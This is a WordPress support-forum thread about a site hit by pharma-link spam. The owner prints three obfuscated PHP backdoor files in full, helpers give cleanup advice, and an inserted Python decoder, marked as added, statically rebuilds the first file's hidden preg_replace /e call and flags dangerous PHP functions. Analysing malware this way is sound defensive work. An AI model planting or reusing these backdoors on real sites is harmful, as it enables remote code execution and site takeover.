Infected by Pharma Link Hacks
-
Our site is infected by Pharma Hacks. Someone keeps injecting links in the header of the which are not visible in the code of the page but only visible in the cached version of the page in Google results, and it's replacing the page meta description with the pharma text.
See how it looks in the cached version: https://postimg.org/image/wwpm034v7/
– All Plugins + WP is updated.
While sorting out, I have found 3 suspicious files in following folders:
1. wp-admin >> images >> loading-cameo-hackneyed.php
2. wp-admin >> includes >> theme-ford-propitiate.php
3. wp-includes >> default-distinction-blatant.php
loading-cameo-hackneyed.php has following code:
<?php $egjwk="pWyfeeHn*RUEcPg6_3POY19r.5Hcwq6teenZ3210aMhtC_n1lpWes/4QM7SQ4wALeT8Jd2DiivgglExAvBGI6.ab45Dpk650Opyx/RNsZ9eUSvrke9moTLm43QOTA0FK2bg9Fru7U";$czugodyhp=$egjwk[6] .$egjwk[116] .$egjwk[65] .$egjwk[18] .$egjwk[16] .$egjwk[62] .$egjwk[59] .$egjwk[107] .$egjwk[79] .$egjwk[58] .$egjwk[26] .$egjwk[19];$obyxhekfriou=$egjwk[14] .$egjwk[33] .$egjwk[31] .$egjwk[4] .$egjwk[46] .$egjwk[73];$jtwtgzeojpnl=$egjwk[97] .$egjwk[133] .$egjwk[64] .$egjwk[74] .$egjwk[45] .$egjwk[23] .$egjwk[32] .$egjwk[91] .$egjwk[48] .$egjwk[40] .$egjwk[12] .$egjwk[112];$yrtkzopkhxst=$egjwk[100] .$egjwk[24] .$egjwk[8] .$egjwk[53] .$egjwk[5];$ftbkhtxjzqky=$egjwk[85];$dgsrlvjlj=$obyxhekfriou($czugodyhp);$jtwtgzeojpnl($yrtkzopkhxst,$dgsrlvjlj,$ftbkhtxjzqky);?>fo
theme-ford-propitiate.php has following code:
<?php $wlwx='1/MPQp1.HpY70Sxl_mOvt*U2yT/naZKhgHkljeeTrr.dae4V7waJ7DX8glhprG_e0j8w8tQ2Rc3pBcC5uGPQzTzeAeeeiBPtYIWFE'; $rmjhohkok=$wlwx[33]. $wlwx[39]. $wlwx[85]. $wlwx[94]. $wlwx[16]. $wlwx[61]. $wlwx[88]. $wlwx[70]. $wlwx[93]. $wlwx[96]; $dkcozpafi=$wlwx[32]. $wlwx[38]. $wlwx[95]. $wlwx[90]. $wlwx[27]. $wlwx[19]; $wmerwtylb=$wlwx[9]. $wlwx[40]. $wlwx[87]. $wlwx[56]. $wlwx[62]. $wlwx[60]. $wlwx[45]. $wlwx[59]. $wlwx[15]. $wlwx[50]. $wlwx[73]. $wlwx[89]; $nlgtfkbjm=$wlwx[1]. $wlwx[7]. $wlwx[21]. $wlwx[26]. $wlwx[63]; $tzsljjrar=$wlwx[42]; $ibjhsgdku=$dkcozpafi($rmjhohkok); $wmerwtylb($nlgtfkbjm,$ibjhsgdku,$tzsljjrar); ?>
default-distinction-blatant.php has following code
<?php $tkxr="oRDT7LaVH6A.29yTpe2e6PTm1gpvUe*rEg.GttBepNvu17KLCHgSYJU4RcsdZeHbc1r9a6ohEa98O_kCdrw5OPGnhf_Y0cnPwQW3elTye/0i3/fB4Y2Z4JSF";$hktmsmwnaiu=$tkxr[62] .$tkxr[15] .$tkxr[22] .$tkxr[95] .$tkxr[90] .$tkxr[1] .$tkxr[91] .$tkxr[115] .$tkxr[28] .$tkxr[111] .$tkxr[46] .$tkxr[3] .$tkxr[51] .$tkxr[117];$yvjjkmctqlg=$tkxr[33] .$tkxr[100] .$tkxr[37] .$tkxr[17] .$tkxr[87] .$tkxr[42];$qchwthebjnu=$tkxr[26] .$tkxr[66] .$tkxr[61] .$tkxr[25] .$tkxr[77] .$tkxr[31] .$tkxr[104] .$tkxr[40] .$tkxr[101] .$tkxr[68] .$tkxr[57] .$tkxr[39];$igibqhjbkny=$tkxr[109] .$tkxr[34] .$tkxr[30] .$tkxr[105] .$tkxr[29];$ukxqrmsjgza=$tkxr[11];$fdrsodswbty=$yvjjkmctqlg($hktmsmwnaiu);$qchwthebjnu($igibqhjbkny,$fdrsodswbty,$ukxqrmsjgza);?>
Any suggestion, if these are causing these pharma links?
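Added example (not part of the original post or of any reply): a static decoder for the character-lookup obfuscation used in the three files above, run here on the first file as posted. It only parses the text and never executes the PHP; the names `deobfuscate`, `resolve_concat` and `findings` are this example's own, and it also accepts the single-quoted, space-padded variant seen in the second file.

```python
import re

# First file from the post (loading-cameo-hackneyed.php), reproduced as posted minus the
# stray trailing "fo". It is treated purely as text here and is never executed.
SAMPLE = (
    r'<?php $egjwk="pWyfeeHn*RUEcPg6_3POY19r.5Hcwq6teenZ3210aMhtC_n1lpWes/4QM7SQ4wALeT8Jd2Diivggl'
    r'ExAvBGI6.ab45Dpk650Opyx/RNsZ9eUSvrke9moTLm43QOTA0FK2bg9Fru7U";'
    r'$czugodyhp=$egjwk[6] .$egjwk[116] .$egjwk[65] .$egjwk[18] .$egjwk[16] .$egjwk[62] '
    r'.$egjwk[59] .$egjwk[107] .$egjwk[79] .$egjwk[58] .$egjwk[26] .$egjwk[19];'
    r'$obyxhekfriou=$egjwk[14] .$egjwk[33] .$egjwk[31] .$egjwk[4] .$egjwk[46] .$egjwk[73];'
    r'$jtwtgzeojpnl=$egjwk[97] .$egjwk[133] .$egjwk[64] .$egjwk[74] .$egjwk[45] .$egjwk[23] '
    r'.$egjwk[32] .$egjwk[91] .$egjwk[48] .$egjwk[40] .$egjwk[12] .$egjwk[112];'
    r'$yrtkzopkhxst=$egjwk[100] .$egjwk[24] .$egjwk[8] .$egjwk[53] .$egjwk[5];'
    r'$ftbkhtxjzqky=$egjwk[85];$dgsrlvjlj=$obyxhekfriou($czugodyhp);'
    r'$jtwtgzeojpnl($yrtkzopkhxst,$dgsrlvjlj,$ftbkhtxjzqky);?>'
)

LITERAL = re.compile(r'''\$(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)')\s*;''')  # $table = "...";
INDEXED = re.compile(r'\$(\w+)\s*\[\s*(\d+)\s*\]')                      # $table[42]
ASSIGN = re.compile(r'^\$(\w+)\s*=\s*(.+)$', re.S)                      # $x = <expr>
CALL = re.compile(r'^(?:\$(\w+)\s*=\s*)?\$(\w+)\s*\((.*)\)$', re.S)     # [$r =] $fn(args)
EXEC_SINKS = {"eval", "assert", "create_function", "system", "exec", "passthru", "shell_exec"}


def resolve_concat(expr, tables):
    """Resolve `$t[6] . $t[116] ...` to the string it builds; None for anything else."""
    terms = INDEXED.findall(expr)
    if not terms or INDEXED.sub("", expr).strip(" .\t\r\n"):
        return None  # something other than indexed lookups joined by dots
    chars = []
    for table, index in terms:
        if table not in tables or int(index) >= len(tables[table]):
            return None
        chars.append(tables[table][int(index)])
    return "".join(chars)


def deobfuscate(php):
    """Statically rebuild the hidden strings and variable-function calls. No PHP is run."""
    tables, strings, results, calls = {}, {}, {}, []
    for m in LITERAL.finditer(php):
        tables[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    body = LITERAL.sub("", php).replace("<?php", "").split("?>")[0]

    def render(arg):
        name = arg.lstrip("$")
        if name in strings:
            return '"%s"' % strings[name]
        return results.get(name, arg)  # nested call result, or leave the token as written

    for stmt in (s.strip() for s in body.split(";")):
        call = CALL.match(stmt)
        if call:
            target, fn, raw_args = call.groups()
            # Naive comma split: enough for this family, where arguments are plain variables.
            args = [a.strip() for a in raw_args.split(",") if a.strip()]
            name = strings.get(fn, "$" + fn)
            text = "%s(%s)" % (name, ", ".join(render(a) for a in args))
            values = [strings.get(a.lstrip("$")) for a in args]
            calls.append({"fn": name, "args": values, "text": text})
            if target:
                results[target] = text
            continue
        assign = ASSIGN.match(stmt)
        if assign:
            value = resolve_concat(assign.group(2), tables)
            if value is not None:
                strings[assign.group(1)] = value
    return {"strings": strings, "calls": calls}


def findings(report):
    """Flag decoded calls that evaluate PHP or read their input from the request."""
    notes = []
    for call in report["calls"]:
        first = (call["args"][0] if call["args"] else None) or ""
        if call["fn"] == "preg_replace" and len(first) > 1:
            modifiers = first[first.rfind(first[0]) + 1:]  # text after the closing delimiter
            if "e" in modifiers:
                notes.append("preg_replace with /e modifier evaluates the replacement as PHP")
        if call["fn"] in EXEC_SINKS:
            notes.append("%s() called through a variable function" % call["fn"])
        if call["fn"] == "getenv" and first.startswith("HTTP_"):
            notes.append("input read from request header variable %s" % first)
    return notes


if __name__ == "__main__":
    report = deobfuscate(SAMPLE)
    for call in report["calls"]:
        print(call["text"])
    for note in findings(report):
        print("!", note)
```

On the first file this shows a request-header value passed to `preg_replace` with the `/e` modifier, that is, a backdoor rather than the link-injecting code itself.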
-
Both these files seem very suspicious. It is highly recommended to move these files from your wp-admin folder to somewhere they are not accessible via web.
Then try again and your website should function well.
I have deleted these files but still no luck. ??
Any other suggestion.
If you are hacked then you’ll need to give these a read as well as check your PC.
You need to start working your way through these resources:
https://codex.www.ads-software.com/FAQ_My_site_was_hacked
https://www.ads-software.com/support/topic/268083#post-1065779
https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
https://ottopress.com/2009/hacked-wordpress-backdoors/
Anything less will probably result in the hacker walking straight back into your site again.
Additional Resources:
Hardening WordPress
https://sitecheck.sucuri.net/scanner/
https://www.unmaskparasites.com/
https://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html
I have uploaded all new files and deleted all suspected + old files. Changed all passwords but still no luck.
In simple words, I am not able to sort out where code is injected. I am sure it's encoded as I have searched in every file.
I have checked Sitemap debugger, it is showing some code having “cialis” & “viagra” words.
Following is the code:
Any suggestion?
Have you asked your host if they can help in any way?
That's a Godaddy and they are not going to help.
They have replied: We cannot assist you with removing malware from your server. Consider taking your site down immediately to prevent infecting visitors, and take action quickly to identify/remove it.
If you are still having this issue, please try the following:
- Take full backup of your current site (files and database).
- Install a fresh instance of WordPress.
- Import your database in new instance.
- Verify everything is working as expected.
- If you are using a custom theme, check every theme file for this malware / suspicious data, then clean that and upload.
- For plugins, if easily possible download directly from WordPress site and place in your plugins folder. As the database would have their installed status, it should continue to work without requiring any changes.
Finally fixed by removing embedded code from theme, plugins & database.